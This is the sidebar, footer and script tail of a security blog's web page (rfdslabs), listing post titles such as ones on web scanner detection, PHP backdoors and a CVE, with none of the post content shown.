</div><div class="bottom_sidebar"></div></div><div class="div_wrap_sidebar"><div class="top_sidebar"></div><div class="sidebar_content" style="float: none"><h2><a class='rsswidget' href='http://feeds.feedburner.com/rfdslabs' title='Syndicate this content'><img style='border:0' width='14' height='14' src='http://www.rfdslabs.com.br/wp-includes/images/rss.png' alt='RSS' /></a> <a class='rsswidget' href='http://www.rfdslabs.com.br/' title='&quot; To temperance . . . in moderation. &quot;'>rfdslabs rss</a></h2><ul><li><a class='rsswidget' href='http://www.rfdslabs.com.br/?p=417' title='How to detect/block WebApp Scanners Wikipedia said: “A web application security is a program witch comunicates with a web application through the web front-end in order to identify potential security vulnerabilities in the web aplication and architectural weaknesses. “ The ideia about this is to explain how it’s simple to block this kind of scanners [&hellip;]'>Detect Web Scanners</a></li><li><a class='rsswidget' href='http://www.rfdslabs.com.br/?p=452' title='A PHP stealth backdoors collection.   1 -&gt; Using cookie [&hellip;]'>PHP Stealth Backdoors</a></li><li><a class='rsswidget' href='http://www.rfdslabs.com.br/?p=440' title='The great Corelan released a tool to gathering information using www.pastebin.com   “Introduction When conducting a pen-test, the process typically starts with the reconnaissance phase, the process of gathering information about your target(s) system, organization or person. Today, we want to present a tool that can be added to your reconnaissance toolkit. T [&hellip;]'>Information Disclosure with Pastebin.com</a></li><li><a class='rsswidget' href='http://www.rfdslabs.com.br/?p=431' title='OHH YEAH I found the front of my first computer. A 80486DX2. The name MANTEL was the company where my father bought the computer. Amazing! [&hellip;]'>My First PC CASE!</a></li></ul></div><div class="bottom_sidebar"></div></div>
</div>

</div></div>


<div id="c_footer">

<div id="recent_top"></div>
<div id="recent_ctr">
<div class="left_footer">
<h2>Recent Entries</h2>

<ul>
	<li><a href='http://www.rfdslabs.com.br/?p=417' title='Detect Web Scanners'>Detect Web Scanners</a></li>
	<li><a href='http://www.rfdslabs.com.br/?p=452' title='PHP Stealth Backdoors'>PHP Stealth Backdoors</a></li>
	<li><a href='http://www.rfdslabs.com.br/?p=440' title='Information Disclosure with Pastebin.com'>Information Disclosure with Pastebin.com</a></li>
	<li><a href='http://www.rfdslabs.com.br/?p=431' title='My First PC CASE!'>My First PC CASE!</a></li>
	<li><a href='http://www.rfdslabs.com.br/?p=413' title='Apple Directory Services Memory Corruption -	CVE-2010-1840'>Apple Directory Services Memory Corruption -	CVE-2010-1840</a></li>
	<li><a href='http://www.rfdslabs.com.br/?p=379' title='VirusTotal &#8211; Malware MD5 Check Tool'>VirusTotal &#8211; Malware MD5 Check Tool</a></li>
	<li><a href='http://www.rfdslabs.com.br/?p=365' title='Fuzzing With man'>Fuzzing With man</a></li>
	<li><a href='http://www.rfdslabs.com.br/?p=359' title='explorer.exe stack overflow'>explorer.exe stack overflow</a></li>
	<li><a href='http://www.rfdslabs.com.br/?p=330' title='Using man for fuzzing to root'>Using man for fuzzing to root</a></li>
	<li><a href='http://www.rfdslabs.com.br/?p=319' title='Engenheiro'>Engenheiro</a></li>
</ul>

</div>

<div class="mid_footer">
<h2>Recent Comments</h2>

<ul>
<li><a href="http://www.rfdslabs.com.br/?p=440#comment-4399" title="Information Disclosure with Pastebin.com"><b>rfds</b></a> in Information Disclosure with Pastebin.com</li>
<li><a href="http://www.rfdslabs.com.br/?p=440#comment-4397" title="Information Disclosure with Pastebin.com"><b>Rodrigo Montoro (Sp0oKeR)</b></a> in Information Disclosure with Pastebin.com</li>
<li><a href="http://www.rfdslabs.com.br/?p=440#comment-4396" title="Information Disclosure with Pastebin.com"><b>Nullthreat</b></a> in Information Disclosure with Pastebin.com</li>
<li><a href="http://www.rfdslabs.com.br/?p=431#comment-4384" title="My First PC CASE!"><b>pauly</b></a> in My First PC CASE!</li>
<li><a href="http://www.rfdslabs.com.br/?p=207#comment-4363" title="Balancinho radical."><b>Uiran</b></a> in Balancinho radical.</li>
<li><a href="http://www.rfdslabs.com.br/?p=34#comment-4360" title="Deficiências Invisíveis"><b>andrea cristina</b></a> in Deficiências Invisíveis</li>
<li><a href="http://www.rfdslabs.com.br/?p=285#comment-4359" title="O cara da informática..."><b>S3CAST #2 &#8211; Histórias do &#8&#8230;</b></a> in O cara da informática...</li>
<li><a href="http://www.rfdslabs.com.br/?p=185#comment-4340" title="Mendigo passa no concurso do Banco do Brasil."><b>EDUARDO</b></a> in Mendigo passa no concurso do Banco do Brasil.</li>
<li><a href="http://www.rfdslabs.com.br/?p=40#comment-4328" title="Crie seu propio sistema operacional."><b>Riller Vinicius</b></a> in Crie seu propio sistema operacional.</li>
<li><a href="http://www.rfdslabs.com.br/?p=242#comment-4307" title="Vamos acabar com as notas "><b>Inês A.</b></a> in Vamos acabar com as notas </li>
</ul>

</div>


<div class="right_footer">
<ul><li><h2>Random Selection of Posts</h2>
    <ul>
     <li><a href="http://www.rfdslabs.com.br/?p=66">Acessibilidade de Verdade!</a></li>
     <li><a href="http://www.rfdslabs.com.br/?p=261">Windows Genuine Advantage Validation v1.8.31.0 Cracked</a></li>
     <li><a href="http://www.rfdslabs.com.br/?p=35">Polar Clock</a></li>
     <li><a href="http://www.rfdslabs.com.br/?p=70">Onze Sugestões para uma Boa Administração de Conflitos</a></li>
     <li><a href="http://www.rfdslabs.com.br/?p=1">Hello world!</a></li>
     <li><a href="http://www.rfdslabs.com.br/?p=53">Aula sobre Rootkits.</a></li>
     <li><a href="http://www.rfdslabs.com.br/?p=221">Microsoft Messenger para Mac 7.01</a></li>
     </ul>
 </li></ul> 
</div>

</div>
<div id="recent_bottom"></div>
</div>

<div id="footer_bg">
<div id="footer_panel">
<div id="footer_panel_text">
&copy; 2008 <a href="http://www.rfdslabs.com.br">rfdslabs</a> is proudly powered by <a href="http://wordpress.org">WordPress</a> <br> Theme designed by <a href="http://roam2rome.com">Roam2Rome</a>

</div>
</div>
</div>

<div id="close_footer"></div>

</div>

<!-- AdSense Manager v4.0.3 (0.342 seconds.) -->	<div style="display:none">
	</div>
<!-- Auto SyntaxHighlighter -->
<script type='text/javascript' src='http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/core-min.js?ver=3.0.83'></script>
<link rel='stylesheet' id='ash_core-css'  href='http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/styles/shCore-min.css?ver=3.0.83' type='text/css' media='all' />
<link rel='stylesheet' id='ash_theme_default-css'  href='http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/styles/shThemeDefault-min.css?ver=3.0.83' type='text/css' media='all' />
<script type='text/javascript'>
SyntaxHighlighter.autoloader(
	'applescript	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushAppleScript-min.js',
	'actionscript3 as3	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushAS3-min.js',
	'bash shell	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushBash-min.js',
	'coldfusion cf	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushColdFusion-min.js',
	'c# c-sharp csharp	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushCSharp-min.js',
	'cpp c	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushCpp-min.js',
	'css	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushCss-min.js',
	'delphi pas pascal	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushDelphi-min.js',
	'diff patch	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushDiff-min.js',
	'erl erlang	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushErlang-min.js',
	'groovy	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushGroovy-min.js',
	'js jscript javascript	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushJScript-min.js',
	'java	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushJava-min.js',
	'jfx javafx	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushJavaFX-min.js',
	'objective-c objc cocoa	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushObjC-min.js',
	'perl pl	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushPerl-min.js',
	'php	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushPhp-min.js',
	'text plain	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushPlain-min.js',
	'ps powershell	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushPowerShell-min.js',
	'py python	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushPython-min.js',
	'rails ror ruby	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushRuby-min.js',
	'scala	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushScala-min.js',
	'sql	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushSql-min.js',
	'vb vbnet	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushVb-min.js',
	'xml xhtml xslt html	http://www.rfdslabs.com.br/wp-content/plugins/auto-syntaxhighlighter/SyntaxHighlighter/build/scripts/shBrushXml-min.js'
);
SyntaxHighlighter.defaults['auto-links'] = false;
SyntaxHighlighter.defaults['toolbar'] = false;
SyntaxHighlighter.all();
</script>
<!-- /Auto SyntaxHighlighter -->
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201405'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ratingsL10n = {"plugin_url":"http:\/\/www.rfdslabs.com.br\/wp-content\/plugins\/wp-postratings","ajax_url":"http:\/\/www.rfdslabs.com.br\/wp-admin\/admin-ajax.php","text_wait":"Please rate only 1 post at a time.","image":"stars_crystal","image_ext":"gif","max":"5","show_loading":"1","show_fading":"1","custom":"0"};
var ratings_mouseover_image=new Image();ratings_mouseover_image.src=ratingsL10n.plugin_url+"/images/"+ratingsL10n.image+"/rating_over."+ratingsL10n.image_ext;;
/* ]]> */
</script>
<script type='text/javascript' src='http://www.rfdslabs.com.br/wp-content/plugins/wp-postratings/postratings-js.js?ver=1.63'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2014Janaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.rfdslabs.com.br/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.5.1'></script>

	<script src="http://stats.wordpress.com/e-201405.js" type="text/javascript"></script>
	<script type="text/javascript">
	st_go({v:'ext',j:'1:2.2.5',blog:'2439789',post:'0',tz:'-3'});
	var load_cmc = function(){linktracker_init(2439789,0,2);};
	if ( typeof addLoadEvent != 'undefined' ) addLoadEvent(load_cmc);
	else load_cmc();
	</script>
</div>

</div>

</body>
</html>